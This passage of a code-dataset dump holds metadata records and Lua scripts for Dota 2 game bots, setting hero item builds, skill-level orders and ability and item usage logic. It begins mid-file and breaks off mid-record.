ITEM_SLOT_TYPE_MAIN then\n\t\tsalve = npcBot:GetItemInSlot(salveLoc)\n\tend\n\tif npcBot:GetItemSlotType(tangoLoc) == ITEM_SLOT_TYPE_MAIN then\n\t\ttango = npcBot:GetItemInSlot(tangoLoc)\n\tend\n\tif npcBot:GetItemSlotType(soulLoc) == ITEM_SLOT_TYPE_MAIN then\n\t\tsoul = npcBot:GetItemInSlot(soulLoc)\n\tend\n\tif npcBot:GetItemSlotType(bootsLoc) == ITEM_SLOT_TYPE_MAIN then\n\t\tboots = npcBot:GetItemInSlot(bootsLoc)\n\tend\n\tif npcBot:GetItemSlotType(portalLoc) == ITEM_SLOT_TYPE_MAIN then\n\t\tportal = npcBot:GetItemInSlot(portalLoc)\n\tend\n\t\n\tif bountyTopRadDist < 200 and bountyTopRadDist ~= 0 then\n\t\tnpcBot:Action_PickUpRune(RUNE_BOUNTY_1)\n\telseif bountyBotRadDist < 200 and bountyBotRadDist ~= 0 then\n\t\tnpcBot:Action_PickUpRune(RUNE_BOUNTY_2)\n\telseif bountyTopDirDist < 200 and bountyTopDirDist ~= 0 then\n\t\tnpcBot:Action_PickUpRune(RUNE_BOUNTY_3)\n\telseif bountyBotDirDist < 200 and bountyBotDirDist ~= 0 then\n\t\tnpcBot:Action_PickUpRune(RUNE_BOUNTY_4)\n\tend\n\t\n\t-- Drop Clarities and Salves if boots acquired\n\tif boots ~= nil then\n\t\tif clarity ~= nil then\n\t\t\tnpcBot:Action_DropItem(clarity, npcBot:GetLocation() + RandomVector(100))\n\t\tend\n\t\tif 
salve ~= nil then\n\t\t\tnpcBot:Action_DropItem(salve, npcBot:GetLocation() + RandomVector(100))\n\t\tend\n\t\tif tango ~= nil then\n\t\t\tnpcBot:Action_DropItem(tango, npcBot:GetLocation() + RandomVector(100))\n\t\tend\n\t\tif portal ~= nil then\n\t\t\tnpcBot:Action_DropItem(portal, npcBot:GetLocation() + RandomVector(100))\n\t\tend\n\tend\n\n\tif botMana/botMaxMana < 0.4 and not npcBot:HasModifier(\"modifier_clarity_potion\") and not npcBot:IsChanneling() then\n\t\tif (bottle == nil and clarity ~= nil) or (bottle ~= nil and bottle:GetCurrentCharges() == 0 and clarity ~= nil) or boots == nil then\n \t\tnpcBot:Action_UseAbilityOnEntity(clarity, npcBot)\n \telseif soul ~= nil and botHP/botMaxHP >= 0.4 and not npcBot:HasModifier(\"modifier_item_soul_ring\") and not npcBot:HasModifier(\"modifier_item_soul_ring_buff\") then\n \t\tnpcBot:Action_UseAbility(soul)\n \tend\n end\n \n\tif botHP/botMaxHP < 0.5 and not npcBot:IsChanneling() then\n\t\tif salve ~= nil and not npcBot:HasModifier(\"modifier_flask_healing\") then\n\t\t\tnpcBot:Action_UseAbilityOnEntity(salve, npcBot)\n\t\telseif bottle ~= nil and bottle:GetCurrentCharges() > 0 and npcBot:DistanceFromFountain() ~= 0 then\n\t\t\tnpcBot:Action_UseAbility(bottle)\n\t\telseif tango ~= nil and #nearbyTrees > 0 and not npcBot:HasModifier(\"modifier_tango_heal\") then\n\t\t\tnpcBot:Action_UseAbilityOnTree(tango, nearbyTrees[1])\n\t\tend\n\tend\n\n -- Use courier if in inventory\n\tif courierLoc ~= nil then\n\t\tlocal courier = npcBot:GetItemInSlot(courierLoc)\n\t\tif courier ~= nil then\n\t\t\tnpcBot:Action_UseAbility(courier)\n\t\tend\n\tend\n\t\n\t-- Use bottle if mana is low\n\tif bottleLoc ~= nil and not npcBot:IsChanneling() then\n\t\tbottle = npcBot:GetItemInSlot(bottleLoc)\n\t\tbottleSlot = npcBot:GetItemSlotType(bottleLoc)\n\t\t\n\t\tif bottle ~= nil and botMana/botMaxMana < 0.3 then\n\t\t\tif bottle:GetCurrentCharges() > 0 then\n\t\t\t\tnpcBot:Action_UseAbility(bottle)\n\t\t\tend\n\t\tend\n\tend\nend"
},
{
"alpha_fraction": 0.5483125448226929,
"alphanum_fraction": 0.5797503590583801,
"avg_line_length": 23.314607620239258,
"blob_id": "4bb55c631517a5611fa6450eac4ad375664a29d5",
"content_id": "45775bf261310a5a9d140d1fc4765bb218960eca",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 2163,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 89,
"path": "/item_build_templar_assassin.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "X = {}\nrequire(GetScriptDirectory() .. \"/UtilityFunctions\")\nlocal npcBot = GetBot()\nlocal talents = fillTalentTable(npcBot)\n\nX[\"items\"] = {\n -- wraith band --\n \"item_slippers\",\n \"item_circlet\",\n \"item_recipe_wraith_band\",\n \"item_branches\",\n \"item_faerie_fire\",\n \"item_boots\",\n \"item_sobi_mask\",\n \"item_ring_of_protection\",\n \"item_gloves\",\n \"item_belt_of_strength\",\n \"item_bottle\",\n \"item_blink\",\n -- Desolator\n \"item_mithril_hammer\",\n \"item_mithril_hammer\",\n \"item_blight_stone\",\n -- Black King Bar\n \"item_ogre_axe\",\n \"item_mithril_hammer\",\n \"item_recipe_black_king_bar\",\n -- Wraith Band --\n \"item_slippers\",\n \"item_circlet\",\n \"item_recipe_wraith_band\",\n -- Force Staff --\n \"item_staff_of_wizardry\",\n \"item_ring_of_health\",\n \"item_recipe_force_staff\",\n -- Dragon Lance --\n \"item_ogre_axe\",\n \"item_boots_of_elves\",\n \"item_boots_of_elves\"\n}\n\nlocal refraction = \"templar_assassin_refraction\"\nlocal meld = \"templar_assassin_meld\"\nlocal psi = \"templar_assassin_psi_blades\"\nlocal psitrap = \"templar_assassin_psionic_trap\"\n\n--special_bonus_attack_speed_25\n--special_bonus_unique_templar_assassin_6\n--special_bonus_armor_7\n--special_bonus_unique_templar_assassin_3\n--special_bonus_unique_templar_assassin_4\n--special_bonus_unique_templar_assassin_2\n--special_bonus_unique_templar_assassin_5\n--special_bonus_unique_templar_assassin\n\nlocal t1 = \"special_bonus_attack_speed_25\"\nlocal t2 = \"special_bonus_unique_templar_assassin_3\"\nlocal t3 = \"special_bonus_unique_templar_assassin_4\"\nlocal t4 = \"special_bonus_unique_templar_assassin_5\"\n\nX[\"skills\"] = {\n psi, -- 1\n refraction, -- 2 \n refraction, -- 3\n psi, -- 4\n refraction, -- 5\n psitrap, -- 6\n refraction, -- 7\n meld, -- 8\n meld, -- 9\n t1, -- 10\n meld, -- 11 \n psitrap, -- 12\n meld, -- 13\n psi, -- 14\n t2, -- 15\n psi, -- 16 \n \"-1\", -- 17\n psitrap, -- 18\n \"-1\", -- 19\t\n t3, -- 20\n \"-1\", -- 21 \t\n \"-1\", -- 22\n \"-1\", -- 23\n \"-1\", -- 24\n t4 -- 25\n}\n\nreturn X"
},
{
"alpha_fraction": 0.560490071773529,
"alphanum_fraction": 0.560490071773529,
"avg_line_length": 30.119047164916992,
"blob_id": "24b4b92132e1c356bb926bbbf0dcc6802c53f85a",
"content_id": "6717c05759854fd2202083bf33066e7b5ba85d1c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 1306,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 42,
"path": "/mode_evasive_maneuvers_generic.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "local npcBot = GetBot()\nlocal botTeam = GetTeam()\n\nfunction think()\n if npcBot:HasModifier(\"modifier_bloodseeker_rupture\") then\n -- if can bkb --\n local bkbSlot = npcBot:FindItemSlot(\"item_black_king_bar\")\n local bkb = nil\n if npcBot:GetItemSlotType(bkbSlot) == ITEM_SLOT_TYPE_MAIN then\n bkb = npcBot:GetItemInSlot(bkbSlot)\n end\n if bkb ~= nil then\n if bkb:IsFullyCastable() then\n npcBot:Action_UseAbility(bkb)\n end\n end\n\n -- if can BoT --\n local botSlot = npcBot:FindItemSlot(\"item_travel_boots\")\n local boT = nil\n if npcBot:GetItemSlotType(botSlot) == ITEM_SLOT_TYPE_MAIN then\n boT = npcBot:GetItemInSlot(botSlot)\n end\n if boT ~= nil then\n if boT:IsFullyCastable() then\n npcBot:Action_UseAbility(boT)\n end\n end\n\n -- if can TP --\n local tpSlot = npcBot:FindItemSlot(\"item_tpscroll\")\n local tp = nil\n if npcBot:GetItemSlotType(tpSlot) == ITEM_SLOT_TYPE_MAIN then\n tp = npcBot:GetItemInSlot(tpSlot)\n end\n if tp ~= nil then\n if tp:IsFullyCastable() then\n npcBot:Action_UseAbility(tp)\n end\n end\n end\nend"
},
{
"alpha_fraction": 0.5027716159820557,
"alphanum_fraction": 0.5310420989990234,
"avg_line_length": 23.391891479492188,
"blob_id": "4b6b57f198baeca8db4ca2a6fbd1ed03afa6e7c9",
"content_id": "c71b0d07b8cb3495bbf60755e7dc38b696c5e204",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 1804,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 74,
"path": "/item_build_beastmaster.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "X = {}\nrequire(GetScriptDirectory() .. \"/UtilityFunctions\")\nlocal npcBot = GetBot()\nlocal talents = fillTalentTable(npcBot)\n\nX[\"items\"] = {\n\t\"item_stout_shield\",\n \"item_tango\",\n \"item_flask\",\n \"item_clarity\",\n \"item_magic_stick\",\n \"item_branches\",\n \"item_branches\",\n \"item_enchanted_mango\",\n \"item_quelling_blade\",\n \"item_boots\",\n \"item_gauntlets\",\n \"item_gauntlets\",\n \"item_ring_of_regen\",\n \"item_recipe_soul_ring\",\n \"item_blades_of_attack\",\n \"item_blades_of_attack\",\n \"item_sobi_mask\",\n \"item_belt_of_strength\",\n \"item_sobi_mask\",\n \"item_recipe_necronomicon\",\n \"item_recipe_necronomicon\",\n \"item_recipe_necronomicon\",\n \"item_blink\",\n \"item_platemail\",\n \"item_hyperstone\",\n \"item_chainmail\",\n \"item_recipe_assault\",\n \"item_ogre_axe\",\n \"item_staff_of_wizardry\",\n \"item_blade_of_alacrity\",\n \"item_point_booster\",\n \"item_gem\"\n}\n\nlocal wild_axes = \"beastmaster_wild_axes\"\nlocal call_of_the_wild = \"beastmaster_call_of_the_wild\"\nlocal inner_beast = \"beastmaster_inner_beast\"\nlocal primal_roar = \"beastmaster_primal_roar\"\n\nX[\"skills\"] = {\n wild_axes, --1\n inner_beast, --2 \n wild_axes, --1\n inner_beast, --4\n wild_axes, --5\n primal_roar, --6\n wild_axes, --7\n inner_beast, --8\n inner_beast, --9\n talents[2], --10\n call_of_the_wild, --11\n primal_roar, --12\n call_of_the_wild, --13\n call_of_the_wild, --14\n talents[3], --15\n call_of_the_wild, --16\n \"-1\", --17\n primal_roar, --18\n \"-1\", --19\n talents[6], --20\n \"-1\", \t --21\n \"-1\", \t --22\n \"-1\", --23\n \"-1\", --24\n talents[8] --25\n}\n\nreturn X"
},
{
"alpha_fraction": 0.5729940533638,
"alphanum_fraction": 0.5822808146476746,
"avg_line_length": 37.74100875854492,
"blob_id": "1771e40a66700ba9f10977068fee06678f47bb1b",
"content_id": "8c6b96c86d53b5a1bfea9bc80cb3138f6a3e50ef",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 5384,
"license_type": "no_license",
"max_line_length": 161,
"num_lines": 139,
"path": "/ability_item_usage_medusa.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "local build = require(GetScriptDirectory()..\"/item_build_medusa\")\nrequire(GetScriptDirectory()..\"/UtilityData\")\nrequire(GetScriptDirectory()..\"/UtilityFunctions\")\n\nlocal npcBot = GetBot()\nlocal botTeam = GetTeam()\n\nfunction AbilityLevelUpThink()\n local skillsToLevel = build[\"skills\"]\n-- if npcBot:GetAbilityPoints() < 1 or (GetGameState() ~= GAME_STATE_PRE_GAME \n-- \tand GetGameState() ~= GAME_STATE_GAME_IN_PROGRESS) then\n-- return\n-- end\n -- for i, item in pairs(skillsToLevel) do\n -- print(i, item)\n -- end\n if npcBot:GetAbilityPoints() > 0 and skillsToLevel[1] ~= \"-1\" \n \tand skillsToLevel[1] ~= nil then\n print(npcBot:GetAbilityPoints(), skillsToLevel[1])\n \tnpcBot:ActionImmediate_LevelAbility(skillsToLevel[1])\n \ttable.remove(skillsToLevel, 1)\n end\nend\n\nfunction AbilityUsageThink()\n local botMana = npcBot:GetMana()\n local botHealth = npcBot:GetHealth()\n local botMaxHealth = npcBot:GetMaxHealth()\n local botMaxMana = npcBot:GetMaxMana()\n local bot_location_x = npcBot:GetLocation()[1]\n local bot_location_y = npcBot:GetLocation()[2]\n local action = npcBot:GetCurrentActionType()\n local action_mode = npcBot:GetActiveMode()\n\n local split_shot = npcBot:GetAbilityByName(\"medusa_split_shot\")\n local mystic_snake = npcBot:GetAbilityByName(\"medusa_mystic_snake\")\n local mana_shield = npcBot:GetAbilityByName(\"medusa_mana_shield\")\n local stone_gaze = npcBot:GetAbilityByName(\"medusa_stone_gaze\")\n\n local nearbyCreeps = npcBot:GetNearbyLaneCreeps(1000, true)\n local nearbyEnemies = npcBot:GetNearbyHeroes(900, true, BOT_MODE_NONE)\n\n -- Mana Shield think --\n cast = false\n if not npcBot:HasModifier(\"modifier_medusa_mana_shield\") then\n if #nearbyEnemies >= 1 then\n cast = true\n elseif botHealth < botMaxHealth*0.1 then\n cast = true\n elseif botHealth < botMaxHealth*0.7 and botMana > botMaxMana*0.7 then\n cast = true\n end\n if action_mode == BOT_MODE_LANING and botMana < mystic_snake:GetManaCost() then\n cast = false\n end\n else\n if #nearbyEnemies == 0 and botMana < botMaxMana*0.3 and botHealth > botMaxHealth*0.8 then\n cast = true\n end\n if action_mode == BOT_MODE_LANING and botMana < mystic_snake:GetManaCost() then\n cast = true\n end\n end\n if not npcBot:IsChanneling() and mana_shield:IsFullyCastable() and cast then\n npcBot:Action_UseAbility(mana_shield)\n end\n\n -- mystic_snake think --\n if action ~= BOT_ACTION_TYPE_USE_ABILITY and action ~= action ~= BOT_ACTION_TYPE_MOVE_TO then\n if not npcBot:IsChanneling() then\n power_count = 0\n count = 0\n closest_unit = nil\n closest_distance = 10000\n if #nearbyEnemies > 0 then\n for j, enemy in pairs(nearbyEnemies) do\n power_count = power_count + 2\n count = count + 1\n if closest_unit == nil then\n closest_unit = enemy\n closest_distance = GetUnitToUnitDistance(npcBot, enemy)\n else\n distance = GetUnitToUnitDistance(npcBot, enemy)\n if distance < closest_distance then\n closest_distance = distance\n closest_unit = enemy\n end\n end\n end\n end\n if #nearbyCreeps > 0 then\n for j, creep in pairs(nearbyCreeps) do\n power_count = power_count + 1\n count = count + 1\n if closest_unit == nil then\n closest_unit = creep\n closest_distance = GetUnitToUnitDistance(npcBot, creep)\n else\n distance = GetUnitToUnitDistance(npcBot, creep)\n if distance < closest_distance then\n closest_distance = distance\n closest_unit = creep\n end\n end\n end\n end\n\n current_jump_amount = mystic_snake:GetLevel() + 2\n if power_count >= 4 and count <= current_jump_amount and mystic_snake:IsFullyCastable() 
then\n npcBot:Action_UseAbilityOnEntity(mystic_snake, closest_unit)\n end\n\n end\n end\n\n -- stone gaze think --\n if action_mode == BOT_MODE_ATTACK or action_mode == BOT_MODE_RETREAT or action_mode == BOT_MODE_DEFEND_ALLY or action_mode == BOT_MODE_EVASIVE_MANEUVERS then\n if #nearbyEnemies >= 2 then\n if not npcBot:IsChanneling() and stone_gaze:IsFullyCastable() then\n npcBot:Action_UseAbility(stone_gaze)\n end\n end\n end\nend\n\nfunction BuybackUsageThink()\n if DotaTime() < -30 and lane_claim then\n local lane_id = npcBot:GetAssignedLane()\n if lane_id == 1 then\n npcBot:ActionImmediate_Chat(\"I'm going Top!\", false)\n elseif lane_id == 2 then\n npcBot:ActionImmediate_Chat(\"I'm going Mid!\", false)\n elseif lane_id == 3 then\n npcBot:ActionImmediate_Chat(\"I'm going Bot!\", false)\n end\n lane_claim = false\n end\n return\nend"
},
{
"alpha_fraction": 0.744381308555603,
"alphanum_fraction": 0.7530254125595093,
"avg_line_length": 36.31797409057617,
"blob_id": "d9c1b426bea28b3df1ebdf95daa23507caa4f1ef",
"content_id": "9eacc2da12167e24c7eae25365d8dc6db2fb3976",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 8098,
"license_type": "no_license",
"max_line_length": 167,
"num_lines": 217,
"path": "/ability_item_usage_lone_druid.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "local build = require(GetScriptDirectory()..\"/item_build_lone_druid\")\nrequire(GetScriptDirectory()..\"/UtilityData\")\nrequire(GetScriptDirectory()..\"/UtilityFunctions\")\n\nlocal npcBot = GetBot()\nlocal botTeam = GetTeam()\n\nlocal spirit = npcBot:GetAbilityByName(\"lone_druid_spirit_bear\")\nlocal rabid = npcBot:GetAbilityByName(\"lone_druid_rabid\")\nlocal roar = npcBot:GetAbilityByName(\"lone_druid_savage_roar\")\nlocal form = npcBot:GetAbilityByName(\"lone_druid_true_form\")\n\nfunction BuybackUsageThink()\nend\n\nfunction AbilityLevelUpThink()\n\tlocal skillsToLevel = build[\"skills\"]\n\tif npcBot:GetAbilityPoints() > 0 and skillsToLevel[1] ~= nil then\n\t\tnpcBot:ActionImmediate_LevelAbility(skillsToLevel[1])\n\t\ttable.remove(skillsToLevel, 1)\n\tend\nend\n\n-- Logic for all Ability Usage behavior\nfunction AbilityUsageThink()\n\t-- Stats\n\tlocal currMana = npcBot:GetMana()\n\tlocal maxMana = npcBot:GetMaxMana()\n\tlocal currHP = npcBot:GetHealth()\n\tlocal maxHP = npcBot:GetMaxHealth()\n\tlocal mode = npcBot:GetActiveMode()\n\tlocal queue = npcBot:NumQueuedActions()\n\tlocal action = npcBot:GetCurrentActionType()\n\tlocal allyList = GetUnitList(UNIT_LIST_ALLIES)\n\n\t-- Recast bear if he's dead\n\tif (npcBot.bear == nil or not npcBot.bear:IsAlive()) and spirit:IsFullyCastable() then\n\t\tnpcBot:Action_UseAbility(spirit)\n\telseif npcBot.bear ~= nil and npcBot.bear:IsAlive() then\n\t\tlocal aghaSlot = npcBot:FindItemSlot(\"item_ultimate_scepter\")\n\t\tlocal bearDist = GetUnitToUnitDistance(npcBot, npcBot.bear)\n\t\tlocal bearAction = npcBot.bear:GetCurrentActionType()\n\t\t\n\t\tif npcBot:GetItemSlotType(aghaSlot) ~= ITEM_SLOT_TYPE_MAIN and bearDist > 1000 and bearAction ~= BOT_ACTION_TYPE_USE_ABILITY then\n\t\t\tnpcBot.bear:Action_UseAbility(npcBot.bear.tele)\n\t\tend\n\tend\nend\n\nfunction ItemUsageThink()\n\tlocal bottle = nil\n\tlocal bottleSlot = nil\n\tlocal botMana = npcBot:GetMana()\n\tlocal botMaxMana = npcBot:GetMaxMana()\n\tlocal botHP = npcBot:GetHealth()\n\tlocal botMaxHP = npcBot:GetMaxHealth()\n\tlocal currentMode = npcBot:GetActiveMode()\n\tlocal botAction = npcBot:GetCurrentActionType()\n\t\n\tlocal nearbyTrees = npcBot:GetNearbyTrees(1600)\n\t\n\tlocal bountyTopRadLoc = GetRuneSpawnLocation(RUNE_BOUNTY_1)\n\tlocal bountyBotRadLoc = GetRuneSpawnLocation(RUNE_BOUNTY_2)\n\tlocal bountyTopDirLoc = GetRuneSpawnLocation(RUNE_BOUNTY_3)\n\tlocal bountyBotDirLoc = GetRuneSpawnLocation(RUNE_BOUNTY_4)\n\t\n\tlocal bountyTopRadDist = GetUnitToLocationDistance(npcBot, bountyTopRadLoc)\n\tlocal bountyBotRadDist = GetUnitToLocationDistance(npcBot, bountyBotRadLoc)\n\tlocal bountyTopDirDist = GetUnitToLocationDistance(npcBot, bountyTopDirLoc)\n\tlocal bountyBotDirDist = GetUnitToLocationDistance(npcBot, bountyBotDirLoc)\n\t\n\tlocal enemies = npcBot:GetNearbyHeroes(1600, true, BOT_MODE_NONE)\n\n\tlocal clarity = nil\n\tlocal bottle = nil\n\tlocal salve = nil\n\tlocal tango = nil\n\tlocal soul = nil\n\tlocal boots = nil\n\tlocal portal = nil\n\tlocal arcane = nil\n\tlocal cyclone = nil\n\tlocal midas = nil\n\t\n\tlocal courierLoc = npcBot:FindItemSlot(\"item_courier\")\n\tlocal clarityLoc = npcBot:FindItemSlot(\"item_clarity\")\n\tlocal bottleLoc = npcBot:FindItemSlot(\"item_bottle\")\n\tlocal salveLoc = npcBot:FindItemSlot(\"item_flask\")\n\tlocal tangoLoc = npcBot:FindItemSlot(\"item_tango\")\n\tlocal soulLoc = npcBot:FindItemSlot(\"item_soul_ring\")\n\tlocal bootsLoc = npcBot:FindItemSlot(\"item_travel_boots\")\n\tlocal portalLoc = 
npcBot:FindItemSlot(\"item_tpscroll\")\n\tlocal arcaneLoc = npcBot:FindItemSlot(\"item_arcane_boots\")\n\tlocal cycloneLoc = npcBot:FindItemSlot(\"item_cyclone\")\n\tlocal bottleLoc = npcBot:FindItemSlot(\"item_bottle\")\n\tlocal midasLoc = npcBot:FindItemSlot(\"item_hand_of_midas\")\n\t\n\tif npcBot:GetItemSlotType(clarityLoc) == ITEM_SLOT_TYPE_MAIN then\n\t\tclarity = npcBot:GetItemInSlot(clarityLoc)\n\tend\n\tif npcBot:GetItemSlotType(bottleLoc) == ITEM_SLOT_TYPE_MAIN then\n\t\tbottle = npcBot:GetItemInSlot(bottleLoc)\n\tend\n\tif npcBot:GetItemSlotType(salveLoc) == ITEM_SLOT_TYPE_MAIN then\n\t\tsalve = npcBot:GetItemInSlot(salveLoc)\n\tend\n\tif npcBot:GetItemSlotType(tangoLoc) == ITEM_SLOT_TYPE_MAIN then\n\t\ttango = npcBot:GetItemInSlot(tangoLoc)\n\tend\n\tif npcBot:GetItemSlotType(soulLoc) == ITEM_SLOT_TYPE_MAIN then\n\t\tsoul = npcBot:GetItemInSlot(soulLoc)\n\tend\n\tif npcBot:GetItemSlotType(bootsLoc) == ITEM_SLOT_TYPE_MAIN then\n\t\tboots = npcBot:GetItemInSlot(bootsLoc)\n\tend\n\tif npcBot:GetItemSlotType(portalLoc) == ITEM_SLOT_TYPE_MAIN then\n\t\tportal = npcBot:GetItemInSlot(portalLoc)\n\tend\n\tif npcBot:GetItemSlotType(arcaneLoc) == ITEM_SLOT_TYPE_MAIN then\n\t\tarcane = npcBot:GetItemInSlot(arcaneLoc)\n\tend\n\tif npcBot:GetItemSlotType(cycloneLoc) == ITEM_SLOT_TYPE_MAIN then\n\t\tcyclone = npcBot:GetItemInSlot(cycloneLoc)\n\tend\n\tif npcBot:GetItemSlotType(midasLoc) == ITEM_SLOT_TYPE_MAIN then\n\t\tmidas = npcBot:GetItemInSlot(midasLoc)\n\tend\n\t\n\tif bountyTopRadDist < 200 and bountyTopRadDist ~= 0 then\n\t\tnpcBot:Action_PickUpRune(RUNE_BOUNTY_1)\n\telseif bountyBotRadDist < 200 and bountyBotRadDist ~= 0 then\n\t\tnpcBot:Action_PickUpRune(RUNE_BOUNTY_2)\n\telseif bountyTopDirDist < 200 and bountyTopDirDist ~= 0 then\n\t\tnpcBot:Action_PickUpRune(RUNE_BOUNTY_3)\n\telseif bountyBotDirDist < 200 and bountyBotDirDist ~= 0 then\n\t\tnpcBot:Action_PickUpRune(RUNE_BOUNTY_4)\n\tend\n\t\n\tif midas ~= nil then\n\t\tlocal midasTarget = _G.getMidasTarget(npcBot)\n\t\t\n\t\tif midas:IsCooldownReady() and not npcBot:IsChanneling() and botAction ~= BOT_ACTION_TYPE_USE_ABILITY then\n\t\t\tnpcBot:Action_UseAbilityOnEntity(midas, midasTarget)\n\t\tend\n\tend\n\t\n\tif roar ~= nil and roar:IsFullyCastable() and botAction ~= BOT_ACTION_TYPE_USE_ABILITY then\n\t\tlocal nearbyEnemies = npcBot:GetNearbyHeroes(350, true, BOT_MODE_NONE)\n\t\t\n\t\tif table.getn(nearbyEnemies) > 0 then\n\t\t\tnpcBot:Action_UseAbility(roar)\n\t\tend\n\tend\n\t\n\t-- Drop Clarities and Salves if boots acquired\n\tif arcane ~= nil then\n\t\tif clarity ~= nil then\n\t\t\tnpcBot:Action_DropItem(clarity, npcBot:GetLocation() + RandomVector(100))\n\t\tend\n\t\tif salve ~= nil then\n\t\t\tnpcBot:Action_DropItem(salve, npcBot:GetLocation() + RandomVector(100))\n\t\tend\n\t\tif tango ~= nil then\n\t\t\tnpcBot:Action_DropItem(tango, npcBot:GetLocation() + RandomVector(100))\n\t\tend\n\t\tif portal ~= nil then\n\t\t\tnpcBot:Action_DropItem(portal, npcBot:GetLocation() + RandomVector(100))\n\t\tend\n\tend\n\t\n\tif cyclone ~= nil and cyclone:IsCooldownReady() and currentMode == BOT_MODE_RETREAT then\n\t\tif table.getn(enemies) > 0 then\n\t\t\tnpcBot:Action_UseAbilityOnEntity(cyclone, enemies[1])\n\t\tend\n\tend\n\n\tif botMana < spirit:GetManaCost() and not npcBot:HasModifier(\"modifier_clarity_potion\") and not npcBot:IsChanneling() then\n\t\tif arcane ~= nil and arcane:IsCooldownReady() then\n\t\t\tprint(\" Using ARCANE BOOTS\")\n \t\tnpcBot:Action_UseAbility(arcane)\n\t\telseif (bottle == nil and clarity ~= nil) or 
(bottle ~= nil and bottle:GetCurrentCharges() == 0 and clarity ~= nil) or boots == nil then\n \t\tnpcBot:Action_UseAbilityOnEntity(clarity, npcBot)\n \telseif soul ~= nil and botHP/botMaxHP >= 0.4 and not npcBot:HasModifier(\"modifier_item_soul_ring\") and not npcBot:HasModifier(\"modifier_item_soul_ring_buff\") then\n \t\tnpcBot:Action_UseAbility(soul)\n \tend\n end\n \n\tif botHP/botMaxHP < 0.5 and not npcBot:IsChanneling() then\n\t\tif salve ~= nil and not npcBot:HasModifier(\"modifier_flask_healing\") then\n\t\t\tnpcBot:Action_UseAbilityOnEntity(salve, npcBot)\n\t\telseif bottle ~= nil and bottle:GetCurrentCharges() > 0 and npcBot:DistanceFromFountain() ~= 0 then\n\t\t\tnpcBot:Action_UseAbility(bottle)\n\t\telseif tango ~= nil and #nearbyTrees > 0 and not npcBot:HasModifier(\"modifier_tango_heal\") then\n\t\t\tnpcBot:Action_UseAbilityOnTree(tango, nearbyTrees[1])\n\t\tend\n\tend\n\n -- Use courier if in inventory\n\tif courierLoc ~= nil then\n\t\tlocal courier = npcBot:GetItemInSlot(courierLoc)\n\t\tif courier ~= nil then\n\t\t\tnpcBot:Action_UseAbility(courier)\n\t\tend\n\tend\n\t\n\t-- Use bottle if mana is low\n\tif bottleLoc ~= nil and not npcBot:IsChanneling() then\n\t\tbottle = npcBot:GetItemInSlot(bottleLoc)\n\t\tbottleSlot = npcBot:GetItemSlotType(bottleLoc)\n\t\t\n\t\tif bottle ~= nil and botMana/botMaxMana < 0.3 then\n\t\t\tif bottle:GetCurrentCharges() > 0 then\n\t\t\t\tnpcBot:Action_UseAbility(bottle)\n\t\t\tend\n\t\tend\n\tend\nend\n"
},
{
"alpha_fraction": 0.6296296119689941,
"alphanum_fraction": 0.6481481194496155,
"avg_line_length": 16.66666603088379,
"blob_id": "44d200231eab5d512409bcfbf01eeeeaad0d44ce",
"content_id": "3df48a5c10b809c73a6189b12bcb65cfb42bcc6b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 54,
"license_type": "no_license",
"max_line_length": 23,
"num_lines": 3,
"path": "/mode_rune_lone_druid.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "\n--function GetDesire()\n--\treturn _G.desires[0]\n--end\n"
},
{
"alpha_fraction": 0.7239709496498108,
"alphanum_fraction": 0.7312348484992981,
"avg_line_length": 18.66666603088379,
"blob_id": "b92682f3eefa17f794fce97d886e56b843004890",
"content_id": "40fae1d2cdbc1aba9c7148a3566b598167f4807c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 413,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 21,
"path": "/mode_laning_techies.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "require(GetScriptDirectory()..\"/UtilityData\")\nrequire(GetScriptDirectory()..\"/UtilityFunctions\")\n\nlocal npcBot = GetBot()\nlocal botTeam = GetTeam()\nlocal botLocArray = {}\n\nfunction OnStart()\n\tnpcBot.other_mode = BOT_MODE_LANING\n\tnpcBot:Action_ClearActions(true)\nend\n\nfunction GetDesire()\n local botLevel = npcBot:GetLevel();\n\n\tif botLevel < 6 then\n\t\treturn _G.desires[5]\n\telse\n\t\treturn _G.desires[0]\n\tend\nend\n"
},
{
"alpha_fraction": 0.5534949898719788,
"alphanum_fraction": 0.5872563123703003,
"avg_line_length": 22.909090042114258,
"blob_id": "9b92ad2fdcda5349ea5b5e7d90bcaab3f5d7dba2",
"content_id": "eddf178732401c7a28705b9e6a4f31425de99635",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 2103,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 88,
"path": "/item_build_legion_commander.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
